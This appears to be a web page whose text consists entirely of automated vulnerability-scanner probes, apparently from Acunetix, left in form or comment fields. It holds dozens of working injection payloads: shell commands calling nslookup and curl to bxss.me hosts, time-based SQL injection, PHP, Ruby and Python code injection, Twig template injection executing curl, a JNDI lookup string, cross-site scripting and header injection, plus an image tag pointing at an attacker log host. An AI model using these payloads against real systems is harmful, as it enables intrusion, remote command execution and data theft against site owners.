&nslookup -q=cname hithopgtxutoe2c4fc.bxss.me&’\”`0&nslookup -q=cname hithopgtxutoe2c4fc.bxss.me&`’ –
555
-1″ OR 5*5=25 — –
555
${@print(md5(31337))} –
555
&(nslookup -q=cname hitgsapzkjhqy7b6b2.bxss.me||curl hitgsapzkjhqy7b6b2.bxss.me)&’\”`0&(nslookup -q=cname hitgsapzkjhqy7b6b2.bxss.me||curl hitgsapzkjhqy7b6b2.bxss.me)&`’ –
555
-1″ OR 5*5=26 — –
555
‘.print(md5(31337)).’ –
555
|(nslookup -q=cname hittupdpjvzxdad02b.bxss.me||curl hittupdpjvzxdad02b.bxss.me) –
555
http://hitdybrbsrbvo.bxss.me/ –
555
pHqghUme –
‘.gethostbyname(lc(‘hitou’.’ddytkwliba4dc.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(106).chr(70).chr(112).chr(84).’
`(nslookup -q=cname hitfwfrdrdjif7aef9.bxss.me||curl hitfwfrdrdjif7aef9.bxss.me)` –
555
hitdybrbsrbvo.bxss.me –
555
pHqghUme –
“.gethostbyname(lc(“hitou”.”vybthqohea013.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(102).chr(83).chr(121).chr(73).”
;(nslookup -q=cname hitahnuqkcoyi32635.bxss.me||curl hitahnuqkcoyi32635.bxss.me)|(nslookup -q=cname hitahnuqkcoyi32635.bxss.me||curl hitahnuqkcoyi32635.bxss.me)&(nslookup -q=cname hitahnuqkcoyi32635.bxss.me||curl hitahnuqkcoyi32635.bxss.me) –
555
pHqghUme –
http://hittgmnuabwfd.bxss.me/
pHqghUme –
gethostbyname(lc(‘hitsm’.’yzosnxdda91c4.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(121).chr(66).chr(120).chr(69)
|(nslookup${IFS}-q${IFS}cname${IFS}hitqlopwstpped42df.bxss.me||curl${IFS}hitqlopwstpped42df.bxss.me) –
555
pHqghUme –
hittgmnuabwfd.bxss.me
[php]print(md5(31337));[/php] –
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitdycccgikbpb75e7.bxss.me||curl${IFS}hitdycccgikbpb75e7.bxss.me)&’\”`0&(nslookup${IFS}-q${IFS}cname${IFS}hitdycccgikbpb75e7.bxss.me||curl${IFS}hitdycccgikbpb75e7.bxss.me)&`’ –
555
pHqghUme'”()&xs(9690) –
555
pHqghUme –
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
pHqghUme –
echo xbhieq$()\ vubozj\nz^xyu||a #’ &echo xbhieq$()\ vubozj\nz^xyu||a #|” &echo xbhieq$()\ vubozj\nz^xyu||a #
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hithurwftoaamba831.bxss.me”)}} –
555
pHqghUme –
‘;print(md5(31337));$a=’
pHqghUme –
&echo vdbben$()\ aequgz\nz^xyu||a #’ &echo vdbben$()\ aequgz\nz^xyu||a #|” &echo vdbben$()\ aequgz\nz^xyu||a #
‘”()&xs(9984) –
555
pHqghUme –
555&echo xikdfq$()\ eehuae\nz^xyu||a #’ &echo xikdfq$()\ eehuae\nz^xyu||a #|” &echo xikdfq$()\ eehuae\nz^xyu||a #
pHqghUme9930936 –
555
pHqghUme –
|echo lmhiiq$()\ llptvi\nz^xyu||a #’ |echo lmhiiq$()\ llptvi\nz^xyu||a #|” |echo lmhiiq$()\ llptvi\nz^xyu||a #
bfg1223<s1﹥s2ʺs3ʹhjl1223 –
555
pHqghUme –
555|echo ucsvcm$()\ dqhdwl\nz^xyu||a #’ |echo ucsvcm$()\ dqhdwl\nz^xyu||a #|” |echo ucsvcm$()\ dqhdwl\nz^xyu||a #
pHqghUme –
expr 9000385981 – 912825
1}}”}}’}}1%>”%>’%> –
555
pHqghUme –
(nslookup -q=cname hitiiyemllpghb1f23.bxss.me||curl hitiiyemllpghb1f23.bxss.me))
pHqghUme –
‘{${print(md5(31337))}}’
pHqghUme –
$(nslookup -q=cname hitekfbljdprq224ba.bxss.me||curl hitekfbljdprq224ba.bxss.me)
pHqghUme –
print(md5(31337));//
pHqghUme –
&nslookup -q=cname hitjwkomdzoao4105b.bxss.me&’\”`0&nslookup -q=cname hitjwkomdzoao4105b.bxss.me&`’
pHqghUme –
{php}print(md5(31337));{/php}
pHqghUme –
&(nslookup -q=cname hitkhfeaxhhtxadc9f.bxss.me||curl hitkhfeaxhhtxadc9f.bxss.me)&’\”`0&(nslookup -q=cname hitkhfeaxhhtxadc9f.bxss.me||curl hitkhfeaxhhtxadc9f.bxss.me)&`’
pHqghUme –
[php]print(md5(31337));[/php]
pHqghUme –
|(nslookup -q=cname hitmzjxyhcyjlcc835.bxss.me||curl hitmzjxyhcyjlcc835.bxss.me)
pHqghUme –
555LbDmFDeY
pHqghUme –
`(nslookup -q=cname hitzuzyyervho88259.bxss.me||curl hitzuzyyervho88259.bxss.me)`
pHqghUme –
555*115*110*0
pHqghUme –
;(nslookup -q=cname hitzzfsylvnco9aebb.bxss.me||curl hitzzfsylvnco9aebb.bxss.me)|(nslookup -q=cname hitzzfsylvnco9aebb.bxss.me||curl hitzzfsylvnco9aebb.bxss.me)&(nslookup -q=cname hitzzfsylvnco9aebb.bxss.me||curl hitzzfsylvnco9aebb.bxss.me)
pHqghUme –
555+120-115-5
pHqghUme –
|(nslookup${IFS}-q${IFS}cname${IFS}hitanggginhct9e7aa.bxss.me||curl${IFS}hitanggginhct9e7aa.bxss.me)
pHqghUme –
555*283*278*0
pHqghUme –
&(nslookup${IFS}-q${IFS}cname${IFS}hitcxadzxtwlf3166c.bxss.me||curl${IFS}hitcxadzxtwlf3166c.bxss.me)&’\”`0&(nslookup${IFS}-q${IFS}cname${IFS}hitcxadzxtwlf3166c.bxss.me||curl${IFS}hitcxadzxtwlf3166c.bxss.me)&`’
pHqghUme –
555+288-283-5
pHqghUme –
555*105*100*0
pHqghUme –
555+110-105-5
pHqghUme –
555*866*861*0
pHqghUme –
555+871-866-5
pHqghUme –
-1 OR 5*5=25
pHqghUme –
-1 OR 5*5=26
pHqghUme –
-1′ OR 5*5=25 —
pHqghUme –
-1′ OR 3*2>999 —
pHqghUme –
-1′) OR 5*5=25 —
pHqghUme –
-1′) OR 3*2>999 —
pHqghUme –
-1′)) OR 5*5=25 —
pHqghUme –
-1′)) OR 5*5=26 —
${j${::-n}di:dns${::-:}${::-/}${::-/}hitqhcrajpjib9bea8${::-.}bxss.me}zzzz${url:UTF-8:http://hitppslgzteql.bxss.me/} –
555
pHqghUme –
-1″ OR 5*5=25 —
obwr3oMl –
555
response.write(9702224*9228933) –
555
pHqghUme –
-1″ OR 5*5=26 —
SomeCustomInjectedHeader: injected_by_wvs –
555
‘+response.write(9702224*9228933)+’ –
555
pHqghUme –
555*if(now()=sysdate(),sleep(15),0)
嘊嘍SomeCustomInjectedHeader: injected_by_wvs –
555
“+response.write(9702224*9228933)+” –
555
pHqghUme –
5550’XOR(555*if(now()=sysdate(),sleep(15),0))XOR’Z
嘊嘍 SomeCustomInjectedHeader: injected_by_wvs –
555
pHqghUme –
response.write(9655657*9879570)
pHqghUme –
5550″XOR(555*if(now()=sysdate(),sleep(15),0))XOR”Z
pHqghUme –
‘+response.write(9655657*9879570)+’
${9999326+10000128} –
555
pHqghUme –
555
pHqghUme –
“+response.write(9655657*9879570)+”
if(now()=sysdate(),sleep(15),0) –
555
SomeCustomInjectedHeader: injected_by_wvs –
555
(nslookup -q=cname hitbqohazcwzz3ac9e.bxss.me||curl hitbqohazcwzz3ac9e.bxss.me)) –
555
pHqghUme –
555-1 waitfor delay ‘0:0:15’ —
$(nslookup -q=cname hitqfaezfdbms62766.bxss.me||curl hitqfaezfdbms62766.bxss.me) –
555
pHqghUme0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z –
555
bxss.me –
555
&nslookup -q=cname hittctafyttqv88303.bxss.me&’\”`0&nslookup -q=cname hittctafyttqv88303.bxss.me&`’ –
555
pHqghUme –
555Da74j8h8′; waitfor delay ‘0:0:15’ —
http://bxss.me/t/fit.txt?.jpg –
555
&(nslookup -q=cname hitgfrhfanzbea3058.bxss.me||curl hitgfrhfanzbea3058.bxss.me)&’\”`0&(nslookup -q=cname hitgfrhfanzbea3058.bxss.me||curl hitgfrhfanzbea3058.bxss.me)&`’ –
555
pHqghUme0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z –
555
pHqghUme –
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
str(__import__(‘time’).sleep(9))+__import__(‘socket’).gethostbyname(‘hitwtqvwqkpfg4db14.’+’bxss.me’) –
555
pHqghUme –
555-1 OR 655=(SELECT 655 FROM PG_SLEEP(15))–
${@print(md5(31337))}\ –
555
pHqghUme”||sleep(27*1000)*tnxvck||” –
555
pHqghUme –
555-1) OR 264=(SELECT 264 FROM PG_SLEEP(15))–
‘{${print(md5(31337))}}’ –
555
pHqghUme-1 waitfor delay ‘0:0:15’ — –
555
print(md5(31337));// –
555
pHqghUme –
555-1)) OR 37=(SELECT 37 FROM PG_SLEEP(15))–
“+”A”.concat(70-3).concat(22*4).concat(120).concat(76).concat(119).concat(66)+(require”socket” Socket.gethostbyname(“hitnc”+”mjygywqs333ee.bxss.me.”)[3].to_s)+” –
555
&(nslookup${IFS}-q${IFS}cname${IFS}hittukslgqszzf6e7d.bxss.me||curl${IFS}hittukslgqszzf6e7d.bxss.me)&’\”`0&(nslookup${IFS}-q${IFS}cname${IFS}hittukslgqszzf6e7d.bxss.me||curl${IFS}hittukslgqszzf6e7d.bxss.me)&`’ –
555
pHqghUmed3tVJlyB’; waitfor delay ‘0:0:15’ — –
555
‘+’A’.concat(70-3).concat(22*4).concat(111).concat(78).concat(102).concat(72)+(require’socket’ Socket.gethostbyname(‘hitcl’+’uusfdinb227a2.bxss.me.’)[3].to_s)+’ –
555
pHqghUme –
echo uqkscu$()\ yqfdch\nz^xyu||a #’ &echo uqkscu$()\ yqfdch\nz^xyu||a #|” &echo uqkscu$()\ yqfdch\nz^xyu||a #
pHqghUme –
555amJWacEh’ OR 935=(SELECT 935 FROM PG_SLEEP(15))–
‘”> –
555
pHqghUme –
&echo kaixdu$()\ kjfpgt\nz^xyu||a #’ &echo kaixdu$()\ kjfpgt\nz^xyu||a #|” &echo kaixdu$()\ kjfpgt\nz^xyu||a #
pHqghUme –
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
pHqghUme –
‘”>
pHqghUme –
555&echo kjkbdj$()\ qjiawj\nz^xyu||a #’ &echo kjkbdj$()\ qjiawj\nz^xyu||a #|” &echo kjkbdj$()\ qjiawj\nz^xyu||a #
pHqghUme –
xfs.bxss.me
pHqghUme –
‘{“
pHqghUme –
|echo qjdfnn$()\ hzzqde\nz^xyu||a #’ |echo qjdfnn$()\ hzzqde\nz^xyu||a #|” |echo qjdfnn$()\ hzzqde\nz^xyu||a #
pHqghUme8NkWC223′) OR 803=(SELECT 803 FROM PG_SLEEP(15))– –
555
pHqghUme –
<!–
pHqghUme –
555|echo dmremf$()\ rbhrsq\nz^xyu||a #’ |echo dmremf$()\ rbhrsq\nz^xyu||a #|” |echo dmremf$()\ rbhrsq\nz^xyu||a #
pHqghUme –
555FsHKOmjy’)) OR 730=(SELECT 730 FROM PG_SLEEP(15))–
pHqghUme –
expr 9000645473 – 944879
‘”()&%uSKV(9311) –
555
pHqghUme –
(nslookup -q=cname hitxrgdhzrwos589fc.bxss.me||curl hitxrgdhzrwos589fc.bxss.me))
pHqghUme9432918 –
555
pHqghUme –
$(nslookup -q=cname hitosxmjoonhyb6ae5.bxss.me||curl hitosxmjoonhyb6ae5.bxss.me)
bfg8998<s1﹥s2ʺs3ʹhjl8998 –
555
pHqghUme –
&nslookup -q=cname hitriemxqubys7db6d.bxss.me&’\”`0&nslookup -q=cname hitriemxqubys7db6d.bxss.me&`’
pHqghUme –
&(nslookup -q=cname hitxojxxgcuts0800b.bxss.me||curl hitxojxxgcuts0800b.bxss.me)&’\”`0&(nslookup -q=cname hitxojxxgcuts0800b.bxss.me||curl hitxojxxgcuts0800b.bxss.me)&`’
@@gpeAS –
555
pHqghUme'”()&%OfuZ(9594) –
555
(select 198766*667891) –
555
pHqghUme –
`(nslookup -q=cname hitkmpiswqwrj66f95.bxss.me||curl hitkmpiswqwrj66f95.bxss.me)`
(select 198766*667891 from DUAL) –
555
pHqghUme –
;(nslookup -q=cname hitdkdhdfekwl9ea97.bxss.me||curl hitdkdhdfekwl9ea97.bxss.me)|(nslookup -q=cname hitdkdhdfekwl9ea97.bxss.me||curl hitdkdhdfekwl9ea97.bxss.me)&(nslookup -q=cname hitdkdhdfekwl9ea97.bxss.me||curl hitdkdhdfekwl9ea97.bxss.me)
pHqghUme –
555CLTqMIjX
pHqghUme –
|(nslookup${IFS}-q${IFS}cname${IFS}hitffvhuplbced48c0.bxss.me||curl${IFS}hitffvhuplbced48c0.bxss.me)
pHqghUme –
555*375*370*0
pHqghUme –
&(nslookup${IFS}-q${IFS}cname${IFS}hitojowsqppev80ad3.bxss.me||curl${IFS}hitojowsqppev80ad3.bxss.me)&’\”`0&(nslookup${IFS}-q${IFS}cname${IFS}hitojowsqppev80ad3.bxss.me||curl${IFS}hitojowsqppev80ad3.bxss.me)&`’
pHqghUme –
555+380-375-5
pHqghUme'”()&%LFkQ(9808) –
555
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hitjzylqucycxfadf9.bxss.me”)}} –
555
‘”()&%LFkQ(9386) –
555
pHqghUme –
555+51-46-5
pHqghUme9539783 –
555
pHqghUme –
555*773*768*0
bfg8517<s1﹥s2ʺs3ʹhjl8517 –
555
pHqghUmeuSKV(9270) –
555
pHqghUmeLFkQ(9484) –
555
pHqghUmeQ06ER[!+!] –
555
pHqghUme –
555cJhgBLaY’; waitfor delay ‘0:0:15’ —
pHqghUmeLFkQ(9804) –
555
pHqghUme –
555-1 OR 733=(SELECT 733 FROM PG_SLEEP(15))–
pHqghUmeLFkQ(9342) –
555
pHqghUme –
555-1) OR 689=(SELECT 689 FROM PG_SLEEP(15))–
pHqghUmeLFkQ(9961)9961 –
555
pHqghUmeLFkQ(9644)9644 –
555
pHqghUme}body{zzz:Expre/**/SSion(uSKV(9864))} –
555
pHqghUmeLFkQ(9055) –
555
pHqghUmeMmtAP uSKV(9156) –
555
pHqghUmeLFkQ(9716) –
555
pHqghUmeVCGCR[!+!] –
555
pHqghUme –
@@lYWiS
pHqghUmeLFkQ(9820) –
555
pHqghUme –
(select 198766*667891 from DUAL)
pHqghUmeuSKV(9835) –
555
pHqghUme\u003CScRiPt\LFkQ(9577)\u003C/sCripT\u003E –
555
pHqghUme –
555′”()&%uSKV(9173)
pHqghUme<ScRiPt>LFkQ(9424)</sCripT> –
555
pHqghUme –
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hitvxgpmtygax8e1b5.bxss.me”)}}
pHqghUme –
‘”()&%uSKV(9882)
pHqghUme}body{zzz:Expre/**/SSion(LFkQ(9311))} –
555
pHqghUme –
5559569105
pHqghUmevG5mv LFkQ(9444) –
555
pHqghUme –
bfg7495<s1﹥s2ʺs3ʹhjl7495
pHqghUme55FFM[!+!] –
555
pHqghUme'”()&%lTNT(9568) –
555
pHqghUme –
pHqghUme –
<th:t="${dfb}#foreach
pHqghUme –
1}}”}}’}}1%>”%>’%>
pHqghUme –
dfb{{98991*97996}}xca
pHqghUme –
dfb[[${98991*97996}]]xca
pHqghUme –
dfb__${98991*97996}__::.x
pHqghUme –
pHqghUme –
1}}”}}’}}1%>”%>’%>
pHqghUme –
555<ScRIpT>uSKV(9275)</sCrIpT>
pHqghUme –
555uSKV(9717)
pHqghUme –
555
pHqghUme –
555uSKV(9137)
pHqghUme –
555
pHqghUme –
555
pHqghUme –
555
pHqghUme –
555
pHqghUme –
555
pHqghUme –
555
pHqghUme –
555
” onerror=alert(9473)>
pHqghUme –
555<ScRiPt>uSKV(9585)</sCripT>
pHqghUme –
pHqghUme –
555
pHqghUme –
pHqghUme –
pHqghUme –
pHqghUme –
pHqghUme –
pHqghUme –
pHqghUme –
pHqghUme –
555}body{zzz:Expre/**/SSion(uSKV(9954))}
pHqghUme –
5555vCx6
uSKV(9057)
pHqghUme'”()&%Ix5g(9834) –
555
pHqghUme –
555
pHqghUme –
555
pHqghUme –
555<img sRc='http://attacker-9536/log.php?
pHqghUme –
555<agA08jm<
pHqghUme –
555<aTZzHho<
pHqghUme –
5559250″();}]9745
pHqghUme –
5559076\”();}]9998
pHqghUme –
%35%35%35%39%33%35%34%22%28%29%3B%7D%5D%39%35%30%31
pHqghUme –
555uSKV(9667)